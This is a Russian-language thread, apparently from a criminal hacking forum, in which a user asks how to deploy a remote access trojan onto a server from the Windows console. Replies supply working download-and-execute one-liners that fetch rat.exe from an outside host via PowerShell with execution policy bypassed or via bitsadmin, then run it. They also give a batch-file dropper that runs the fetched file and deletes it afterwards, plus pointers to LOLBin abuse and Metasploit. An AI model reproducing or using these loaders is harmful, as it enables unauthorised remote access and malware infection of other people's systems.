Добрий день столкнуса с задачей залить ратник или стороннее по через консоль,подойдет любое решение которое поможет получить удаленний доступ к серваку
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Как залить ратник через консоль винды?
- Автор темы Ott_Fon_Bismark
- Дата начала
PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://host.ws/rat.exe','%temp%\3883883.exe');Start-Process '%temp%\3883883.exe'";
Ile
bitsadmin /transfer tget /download /priority high http://host.ws/rat.exe %temp%\44484884.exe&start %temp%\44484884.exe"
Ile 4eres FTP, dobavte Firewall regkey sna4alo
Ile
bitsadmin /transfer tget /download /priority high http://host.ws/rat.exe %temp%\44484884.exe&start %temp%\44484884.exe"
Ile 4eres FTP, dobavte Firewall regkey sna4alo
https://xss.pro/threads/41927/
Использовать metasploit, на форуме полно мануалов.
- Автор темы
- Добавить закладку
- #5
на виндовс 10 грузит а на 7 не хочет вообще я уже все перепробивал (кто шарит в чем проблема скажите как ее исправить буду благодарен) сам пейлоад:
Cmd /c powershell.exe -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('https://cdn-141.anonfiles.com/X529c1o0pb/f2d13c75-1604966257/test17.exe','C:\ProgramData');Start-Process 'C:\ProgramData\test17.exe'"
Пробуй частями:
И посмотри, создаётся-ли файл после первой команды.
Ну и грузить можно не только через PS:
lolbas-project.github.io
Код:
powershell.exe -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe','C:\ProgramData\putty.exe')
powershell.exe -ExecutionPolicy Bypass (Start-Process 'C:\ProgramData\putty.exe')Ну и грузить можно не только через PS:
LOLBAS
lolbas-project.github.io
- Автор темы
- Добавить закладку
- #7
как я понял дело бистрей всего в ссилке (не сирая) потому что толком перепробивал все ссл тлс разние команди(как найду решение опишу как решил и скину в теме)Пробуй частями:
И посмотри, создаётся-ли файл после первой команды.Код:powershell.exe -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe','C:\ProgramData\putty.exe') powershell.exe -ExecutionPolicy Bypass (Start-Process 'C:\ProgramData\putty.exe')
Ну и грузить можно не только через PS:
LOLBAS
создаем файл: D0wnl0ad.bat
Если у тебя только командная строка, то юзаем команду Echo
Пример:
Важно ">" одна галочка ТОЛЬКО в первой строке, это означает писать файл с нуля, ">>", дописать в файл, не перезаписывая его с нуля.
Работает в любой ОС.......................................
ЗЫ: Выполнение PowerShell не всегда доступно, бывает, что эта опция выключена или сильно зарезана..., описанный мной способ работает всегда)
Если у тебя только командная строка, то юзаем команду Echo
Пример:
Код:
echo set target=https://ozon-st.cdn.ngenix.net/s3/multimedia-2/6000075098.jpg>D0wnl0ad.bat
echo set localfile=%userprofile%\desktop\%hostname%.jpg>>D0wnl0ad.bat
echo call :Download>>D0wnl0ad.bat
...
...
....
.
.....Важно ">" одна галочка ТОЛЬКО в первой строке, это означает писать файл с нуля, ">>", дописать в файл, не перезаписывая его с нуля.
Код:
@echo off
:: Откуда скачать.
set target=https://ozon-st.cdn.ngenix.net/s3/multimedia-2/6000075098.jpg
:: Куда положить.
set localfile=%userprofile%\desktop\%hostname%.jpg
call :Download
:Download
bitsadmin /transfer debjob /download /priority normal %target% %localfile%
:: Старт файла с ожиданием завершения процесса.
start /wait %localfile%
:: Удаляем файл после того, как он отработал.
erase %localfile% /Q
exitРаботает в любой ОС.......................................
ЗЫ: Выполнение PowerShell не всегда доступно, бывает, что эта опция выключена или сильно зарезана..., описанный мной способ работает всегда)
Последнее редактирование:
чтобы найти новые #LOLBin вот лайфхак от меня
